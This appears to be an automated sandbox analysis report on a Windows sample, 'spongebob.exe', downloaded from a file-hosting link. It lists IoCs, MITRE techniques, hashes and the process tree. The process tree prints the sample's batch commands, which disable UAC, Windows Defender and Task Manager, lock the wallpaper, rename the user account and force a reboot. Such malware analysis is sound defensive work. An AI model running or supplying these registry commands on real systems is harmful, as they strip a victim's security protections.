Analysis
-
max time kernel
31s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 15:27
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/dmJvEk
Resource
win10v2004-20250502-en
Errors
General
-
Target
https://gofile.io/d/dmJvEk
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 api.gofile.io 16 api.gofile.io -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
resource yara_rule behavioral1/memory/5896-220-0x0000000000400000-0x00000000007BF000-memory.dmp upx behavioral1/memory/5896-344-0x0000000000400000-0x00000000007BF000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spongebob.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "19" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921420318530982" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4200 reg.exe 5852 reg.exe 5236 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4008 chrome.exe 4008 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 4008 chrome.exe Token: SeCreatePagefilePrivilege 4008 chrome.exe Token: SeShutdownPrivilege 3584 shutdown.exe Token: SeRemoteShutdownPrivilege 3584 shutdown.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe 4008 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4940 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4008 wrote to memory of 1840 4008 chrome.exe 85 PID 4008 wrote to memory of 1840 4008 chrome.exe 85 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 1576 4008 chrome.exe 87 PID 4008 wrote to memory of 1576 4008 chrome.exe 87 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 3960 4008 chrome.exe 86 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89 PID 4008 wrote to memory of 4284 4008 chrome.exe 89
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/dmJvEk1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff4366dcf8,0x7fff4366dd04,0x7fff4366dd102⤵PID:1840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1932 /prefetch:22⤵PID:3960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1288,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:32⤵PID:1576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2528 /prefetch:82⤵PID:372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3000,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3028 /prefetch:12⤵PID:4284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3020,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3068 /prefetch:12⤵PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4280 /prefetch:22⤵PID:2288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3004,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4708 /prefetch:12⤵PID:2564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:5592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5244,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5480 /prefetch:12⤵PID:5232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3212,i,1963862348485260835,5777030218213550792,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5800 /prefetch:82⤵PID:5652
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5764
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4124
-
C:\Users\Admin\Documents\Spongebob\spongebob.exe"C:\Users\Admin\Documents\Spongebob\spongebob.exe"1⤵
- System Location Discovery: System Language Discovery
PID:5896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F211.tmp\SpongebobFuck.cmd""2⤵
- System Location Discovery: System Language Discovery
PID:3568 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f3⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5388
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵
- System Location Discovery: System Language Discovery
PID:3456
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4200
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5852
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:4144
-
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5236
-
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB WAS HERE!!!"3⤵
- System Location Discovery: System Language Discovery
PID:3836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"4⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa397d055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4940
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:4536
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5b121704ec76097bcfc05c1c466d0bf5c
SHA1e2dbfc6ad73c4e0536418e1dc52c865469c860be
SHA2568c513e65cc29b681d895c3aab61135fe029ba3732cd2c49be73626e91a6bcde8
SHA5121fadd50a54d7a8d6fe68d607d81a61ae9e4f583b2ff3aeb9c303381b0b72dcdbbed1d6a83348cbdc27cc5139ef1c4d74bbf62e07e7fbe805b587bef3de13df87
-
Filesize
192B
MD5fcbbdd23a80e8d3f37f9a45aac173173
SHA1f8d3969aebc1e5c00abacb41f5b1ea675e2e13b3
SHA25649ca5edd552ce402076dad6d2e4b572105cb96bd4d074bba53440f0fa33ac47b
SHA512b019d78fe135216a67d3e7a44b87fa912b39aae96493c75145c4f340b035b06d1c144453fcad9c049ee178c39d5a8130b4cdc973405dc7bd221b238ce1fbf6be
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
2KB
MD531e5908826a0a151f4c6b7271a944beb
SHA1d51828685e02ed0192247ab90a20d5b52bf34caf
SHA256ee68809a791f800a5c8d04eec6c993df56dd721fdb224b938390ba66a7cf9398
SHA512b5f980ecbf724d8b126359cfcbfaf2382fa8e36da9be6e1625fa0ba8b8ee51b381aa13f6e41168dfa1592e6cd4d15c24b786c3d6882d279b1e00e747197089c2
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
690B
MD5a005109f7a9aa3760277f9cb56f8f8fb
SHA1e9967de336b58ba7585a76547807d9f1325e07ba
SHA256e89c2751a6975e15483957bf44070e9f3daa35190f94b8257eac20de041e4eb6
SHA512754321a31664316788455f8da7ec5de0b3ede6315962096b38d18531fd3a2cc79db5b3226cea1664b9c80872b68cf3628353b829d2addf5ab7ab00edea711580
-
Filesize
10KB
MD53f9da8e73b2f79ecf4f578f5826b4d6c
SHA1877c13e852ca5d9d4844c154d0acd6146dbd1afd
SHA2560a438194a4880ab05a347c82c914082e936f6a0e483a52f9366eabd338b2877e
SHA5127073b916beb1144c64cf2bef6b42384fc7af55368d6daf67814c17b87c9555f560a0335d694f9db5fa1b9ece87245efa11f49973e14917f878eb5c3b9b670f01
-
Filesize
15KB
MD5e729efef0721795dcd37e91fefe504c8
SHA1e6d9aeb11858ff7af01fbacc769df6efe776441c
SHA256dd886131b239603bd651803f5e321850072bac71afa2c0f38ce33b6b2f9bca2c
SHA512326ab39fe84c0a1d8efd371262742e83bd185359717178360e846fec312483eb826887733cdda30c9dc30c2e125efd048a8915707e91c9d83eb92c43cfbf6839
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD59d482dd4329441ab7f8c35d7fab3bc16
SHA1ba8c08558ac73fcf21e07e2387fb7812cb07a068
SHA25609ba5a2380da4020b18e235e6033236cf102e798afee8cd59ab51ba6dbb8439a
SHA5128601e2e0b12814d838c4c845e345b3a722535cceeab93237c9cdc981a87c02ebde6a30c01afba1ae11c60c7feedb523257a44abe002ba057aff605a4ccdbc5ed
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD55010e50206c1524207d3f6d9b2d904d8
SHA141ca116137529d7252e6b9b741bdad186265e22a
SHA256ab29fe3223b155e184c3683f296d9a19317a9f567e3f017172139ab82372932f
SHA512d6b577e20adad36202cf19cd4a82500fb9cad1e337c356fbadc631c63b457f67e023b9b0b9fffc1752a3e6a08f65ace233b40a48b6cbaafb30291404622a1645
-
Filesize
80KB
MD5bfdbe87e9b36799848922cded20b63d5
SHA19065ee0facac6b4c16b4a896b6e8abaf140b1fa9
SHA256ba9cc0d1ba66ca38b6f2c182e99c885e721bfcb2e59f5a0cf8f452bb013e87d3
SHA512a65d08848fd60785d6cad11c45116c3bb2bf064c963eb47fde5147a82dc3d902fcabed599c555083eb11ff642031e5d73edd08dbf20769fcbe91ba5a0f6779a2
-
Filesize
79KB
MD53e4a131ef62fe89c555b4467b7526a94
SHA158cd304bb2d362749e54e6f0d798d34be991dff5
SHA2569a7ef4a225f013493d468fde2116402a2af6d275f39f13c5f7dfc176e82e48ab
SHA51217eb603f13b3f8741cf0181ab1ebfd5156440d38ca59135e8953e9857cd03fb7d63f2e6e5a9d230cac914f459852d1f0dea5e1eb4689e503226ef04707899245
-
Filesize
80KB
MD5b96e8c556ddd5b4b25bc95f415897546
SHA18ce784264cb3faf19973573bd681f1dbb39ef8b1
SHA2567e480f9367094cb33186d29a088136ccf576573314f436d2ded0056a23bc6016
SHA51274bb912bbcf462db90d99f347ec9179b47eb4cd7453aa7e125b7a81eb2400f7c76079636c61c8a4a91bf576ae57a3ca2d09194931c40ba6c7de584c91427516b
-
Filesize
92KB
MD503d8b31db1ed1294334b872f756ad1a1
SHA13f57aa9b9efb1ad9d576d799d9306abd4befdf89
SHA2567e17dcaafc07877e720b3fc0e666ac69e2dce8e7458ae9b23902bcf5f8f2a40a
SHA51255a979189ead8886c5fc3f35b927a80f8dff7a1d52136305c9efee7bc4f1b151d06348e75bef5b3203c47aaed98dc73692f097f7a967c64b9b743a5402012a86
-
Filesize
11KB
MD57a918ed93f7fb297e05464edccc46756
SHA19464288fed7ba5d88928265882def5e05ffbe7db
SHA25682fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1
-
Filesize
2.6MB
MD5ce45a70d3cc2941a147c09264fc1cda5
SHA144cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149
-
Filesize
131B
MD58884a25e47d799f6bd3d4ec20f05a3b7
SHA18959822be4ecff5dd7fbdd714cd85775345d39c5
SHA2565a68437edd63bd826a1f1557121d4c05114c608fd8a18a0c9c156a60d90bd0c1
SHA5123722494fda291fe85f9276dc656b49fb977eea6403cf3a0b6bfaa77c1ec74a70c2a3012e420129f3c1fd939ef7928d94f0320a128b7087fa8f4f4080ae70973b
-
Filesize
548KB
MD5c1978e4080d1ec7e2edf49d6c9710045
SHA1b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA5122de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e
-
Filesize
7.3MB
MD5f0bc760a442d651bf4eb6ed08856bb18
